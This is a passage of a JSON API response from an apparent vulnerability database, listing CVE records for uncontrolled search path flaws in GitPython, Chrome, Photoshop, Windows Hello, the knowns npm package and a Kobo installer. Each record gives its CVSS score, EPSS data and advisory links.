installation.","cveId":"CVE-2026-68955","cvssScore":8.4,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://help.kobo.com/hc/en-us/articles/42294089837463-Security-Advisory-Kobo-Desktop-App-Installer","type":"advisory","title":"vultures@jpcert.or.jp"},{"url":"https://jvn.jp/en/jp/JVN18593874/","type":"advisory","title":"vultures@jpcert.or.jp"}],"epssScore":0.00181,"epssPercentile":0.07017,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-14T07:17:16.663Z","addedAt":"2026-09-14T07:50:34.952Z","updatedAt":"2026-09-16T19:50:38.462Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-68955","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-68955","note":"authoritative record"}]},{"id":"ee9c7156-f944-4459-a05a-289e36107e72","slug":"cve-2026-87817","externalId":"CVE-2026-87817","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-87817 — GitPython before 3.1.60 fails to properly validate the git directory location, allowing attackers to impersonate the git directory using tracked fi…","description":"GitPython before 3.1.60 fails to properly validate the git directory location, allowing attackers to impersonate the git directory using tracked files like gitdir, commondir, and HEAD. Attackers can execute arbitrary code by placing a malicious pre-commit hook in the tracked hooks directory that executes when a victim calls index.commit() on a cloned or opened repository.","cveId":"CVE-2026-87817","cvssScore":8.7,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":"gitpython project","product":"gitpython","affectedVersions":["< 3.1.60","pkg:pypi/gitpython < 3.1.60"],"cwes":["CWE-94","CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","osv","osv:pysec-2026-3982","ecosystem:pypi","osv:ghsa-239g-whfq-7xj9"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-239g-whfq-7xj9","type":"other","title":"OSV web"},{"url":"https://www.vulncheck.com/advisories/gitpython-before-3.1.60-remote-code-execution-via-git-directory-impersonation","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-3982","type":"advisory","title":"OSV PYSEC-2026-3982"},{"url":"https://osv.dev/vulnerability/GHSA-239g-whfq-7xj9","type":"advisory","title":"OSV GHSA-239g-whfq-7xj9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-87817","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/gitpython-developers/GitPython/pull/2218","type":"other","title":"OSV web"},{"url":"https://github.com/gitpython-developers/GitPython/commit/c7cf4d13b1ed0a2e70f2a1f3c6b4fc6c2652cf0b","type":"other","title":"OSV web"},{"url":"https://github.com/gitpython-developers/GitPython","type":"vendor","title":"OSV package"},{"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.60","type":"other","title":"OSV web"},{"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3982.yaml","type":"other","title":"OSV web"}],"epssScore":0.00405,"epssPercentile":0.3262,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-09T12:17:16.830Z","addedAt":"2026-09-09T13:51:15.632Z","updatedAt":"2026-10-01T01:54:20.021Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-87817","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-87817","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/PYSEC-2026-3982"}]},{"id":"8236d819-acbb-4a86-980e-2f306cd3eb12","slug":"cve-2026-87530","externalId":"CVE-2026-87530","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-87530 — Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute ar…","description":"Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)","cveId":"CVE-2026-87530","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H","severity":"high","vendor":"google","product":"chrome","affectedVersions":["< 153.0.8010.36"],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","msrc","vendor-advisory","microsoft","cve"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-87530"],"references":[{"url":"https://chromereleases.googleblog.com/2026/09/stable-channel-update-for-desktop_0808145027.html","type":"vendor","title":"Release Notes"},{"url":"https://issues.chromium.org/issues/518081914","type":"advisory","title":"Permissions Required"},{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-87530","type":"vendor","title":"Microsoft MSRC: Chromium CVE-2026-87530: Uncontrolled search path element in CredentialProvider"}],"epssScore":0.00144,"epssPercentile":0.03203,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-09T01:17:10.360Z","addedAt":"2026-09-09T01:50:34.087Z","updatedAt":"2026-09-15T01:52:56.461Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-87530","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-87530","note":"authoritative record"}]},{"id":"062609ab-83fb-47fc-83d7-45938924a2cc","slug":"cve-2026-76199","externalId":"CVE-2026-76199","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76199 — Photoshop Desktop is affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of …","description":"Photoshop Desktop is affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.","cveId":"CVE-2026-76199","cvssScore":8.6,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H","severity":"high","vendor":"adobe","product":"photoshop","affectedVersions":[">= 26.0, < 26.11.7",">= 27.0, < 27.7"],"cwes":["CWE-427"],"tags":["nvd","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://helpx.adobe.com/security/products/photoshop/apsb26-130.html","type":"vendor","title":"Vendor Advisory"}],"epssScore":0.00293,"epssPercentile":0.20078,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T20:18:24.280Z","addedAt":"2026-09-08T21:50:42.231Z","updatedAt":"2026-09-11T19:50:34.417Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76199","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76199","note":"authoritative record"}]},{"id":"82ab7452-ba1a-4e93-aefa-d33170148f12","slug":"cve-2026-72980","externalId":"CVE-2026-72980","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-72980 — Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.","description":"Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.","cveId":"CVE-2026-72980","cvssScore":5.5,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","severity":"medium","vendor":"microsoft","product":"windows 10 1607","affectedVersions":["< 10.0.14393.9512","< 10.0.17763.9245","< 10.0.19044.7725","< 10.0.19045.7725","< 10.0.22631.7582","< 10.0.26100.9445","< 10.0.26200.9445","< 10.0.28000.2954","< 10.0.20348.5622","< 10.0.26100.33438"],"cwes":["CWE-427"],"tags":["nvd","status:awaiting-analysis","status:undergoing-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-72980"],"references":[{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-72980","type":"patch","title":"Vendor Advisory"}],"epssScore":0.00574,"epssPercentile":0.4565,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T18:20:24.480Z","addedAt":"2026-09-08T19:50:42.048Z","updatedAt":"2026-09-17T19:50:37.286Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-72980","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-72980","note":"authoritative record"}]},{"id":"6b57b90f-5289-4a6f-aaa7-c0e687c98573","slug":"cve-2026-86540","externalId":"CVE-2026-86540","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-86540 — knowns versions before 0.30.0 fail to validate the settings.lsp.languages binary field in project configuration files, allowing attackers to execut…","description":"knowns versions before 0.30.0 fail to validate the settings.lsp.languages binary field in project configuration files, allowing attackers to execute arbitrary binaries by crafting a malicious .knowns/config.json file. When a repository with a crafted configuration is opened, the unvalidated binary path is executed twice under the user's account without any verification.","cveId":"CVE-2026-86540","cvssScore":8.5,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":"npm","product":"knowns","affectedVersions":["pkg:npm/knowns < 0.30.0"],"cwes":["CWE-78","CWE-427","CWE-829","CWE-94"],"tags":["nvd","status:received","status:deferred","osv","osv:ghsa-mc52-mwq4-vfx3","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/knowns-dev/knowns/blob/v0.29.1/internal/lsp/detect.go#L128-L157","type":"other","title":"OSV web"},{"url":"https://github.com/knowns-dev/knowns/blob/v0.29.1/internal/models/config.go#L205-L216","type":"other","title":"OSV web"},{"url":"https://github.com/knowns-dev/knowns/commit/d3989829fb5095666d23d005b2f78a082832a396","type":"other","title":"OSV web"},{"url":"https://github.com/knowns-dev/knowns/releases/tag/v0.30.0","type":"other","title":"OSV web"},{"url":"https://github.com/knowns-dev/knowns/security/advisories/GHSA-mc52-mwq4-vfx3","type":"other","title":"OSV web"},{"url":"https://www.vulncheck.com/advisories/knowns-before-0.30.0-arbitrary-code-execution-via-lsp-binary","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-mc52-mwq4-vfx3","type":"advisory","title":"OSV GHSA-mc52-mwq4-vfx3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86540","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/knowns-dev/knowns","type":"vendor","title":"OSV package"}],"epssScore":0.00212,"epssPercentile":0.10583,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-07T23:16:53.723Z","addedAt":"2026-09-07T23:50:32.885Z","updatedAt":"2026-10-07T00:42:42.695Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86540","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-86540","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-MC52-MWQ4-VFX3"}]}],"pagination":{"page":1,"limit":20,"total":126,"totalPages":7,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-09T01:21:12.335Z","durationMs":28,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-427"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}